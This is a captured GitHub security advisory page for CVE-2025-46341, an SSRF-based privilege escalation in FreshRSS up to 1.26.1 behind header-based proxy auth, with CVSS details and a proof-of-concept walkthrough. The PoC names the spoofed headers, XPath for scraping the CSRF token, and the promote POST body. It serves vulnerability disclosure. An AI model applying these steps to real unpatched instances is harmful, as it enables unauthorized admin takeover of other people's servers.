| CARVIEW |
Select Language
HTTP/2 200
date: Wed, 23 Jul 2025 19:16:25 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, X-Requested-With,Accept-Encoding, Accept, X-Requested-With
etag: W/"9931e5e23180a8d5d7a03d8146b8443d"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com release-assets.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com copilotprodattachments.blob.core.windows.net/github-production-copilot-attachments/ github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/
server: github.com
content-encoding: gzip
accept-ranges: bytes
set-cookie: _gh_sess=tkLnKTYm0BQ4WTX0x0tOjNGcAdLHLF9YNBUY3YM8ZpQoMRpNVEuN5%2Fz6jpl4h%2FCtHtXKqAqyiDdpPj2s7bk3QAHG2Jg5qCo%2FBFP0tIwE83ioLHa5vaB94Ykcyjr270nWI4dyS71rpoWfmiPH7bNi0Rcx3YrMUkg%2BKIckWeaDcl2tJKSZojml47sO%2BqoggVA6UIpLFWr%2Ff%2BcOORxFkamHaAWPV6LJiTC8pBEu%2FrdhtKjtdVqfCIntHGFgFhgoK7C7UCPXaukE7jsl%2B8M56%2Bnoxw%3D%3D--rPe5VuS0AJo3%2BS0w--e%2BYg5S%2BDrCgVGjEeOKz%2BiA%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax
set-cookie: _octo=GH1.1.1024585201.1753298184; Path=/; Domain=github.com; Expires=Thu, 23 Jul 2026 19:16:24 GMT; Secure; SameSite=Lax
set-cookie: logged_in=no; Path=/; Domain=github.com; Expires=Thu, 23 Jul 2026 19:16:24 GMT; HttpOnly; Secure; SameSite=Lax
x-github-request-id: DD34:394F4C:1036B30:1333D7D:68813508
Privilege escalation via SSRF when using HTTP auth · Advisory · FreshRSS/FreshRSS · GitHub
Skip to content
Navigation Menu
{{ message }}
-
-
Notifications
You must be signed in to change notification settings - Fork 977
Privilege escalation via SSRF when using HTTP auth
High
Package
No package listed
Affected versions
<=1.26.1
Patched versions
1.26.2
Description
Severity
High
/ 10
CVSS v3 base metrics
Attack vector
Network
Attack complexity
High
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
Low
Availability
None
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N
CVE ID
CVE-2025-46341
Weaknesses
Weakness CWE-918
Server-Side Request Forgery (SSRF)
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Learn more on MITRE.Credits
-
Inverle Reporter
You can’t perform that action at this time.
Summary
When the server is using HTTP auth via reverse proxy, it's possible to impersonate any user either via the
Remote-Userheader or theX-WebAuth-Userheader by making specially crafted requests via the add feed functionality and obtaining the CSRF token via XPath scrapingDetails
The attacker has to know the IP address of the proxied FreshRSS instance and the admin's username, while also having an account on the instance.
An example server configuration that is vulnerable to the attack is running Authentik where the Proxy provider is being used, with the
Remote-UserorX-WebAuth-Userheader being passed to the FreshRSS instance.Note that the IP address under which the FreshRSS instance is running must be included in the
TRUSTED_PROXYenvironment variable.This happens when both
AuthentikandFreshRSSare running under Docker.PoC
Let's say that the proxy is running under the
https://192.168.91.132:80URL, and the FreshRSS instance is athttps://192.168.91.132:8080An external attacker wouldn't be able to spoof the
Remote-Userheader from their IP address, because it is not included in theTRUSTED_PROXYenvironment variable.However, the FreshRSS instance IP address is, so those are the following steps that have to be taken:
First, let's obtain the CSRF token as such, assuming that the admin user is
akadmin:(xpath is
//*[@id="mark-read-aside"]/input/@value)Now, this is what we'll see in our feed if we haven't gotten an error:
Now, all we have to do is promote ourselves using the CSRF token:
used URL is
https://192.168.91.132:8080/i/?c=user&a=manage&username=exampleand xpath is//*[@id="dialogMsg"]POST body is
_csrf=[token]&action=promoteWe'll observe that we're admin now after sending the request:
Impact
An attacker can send specially crafted requests in order to gain unauthorized access to internal services. This can also lead to privilege escalation like in the demonstrated scenario, although users that have setup OIDC are not affected by privilege escalation.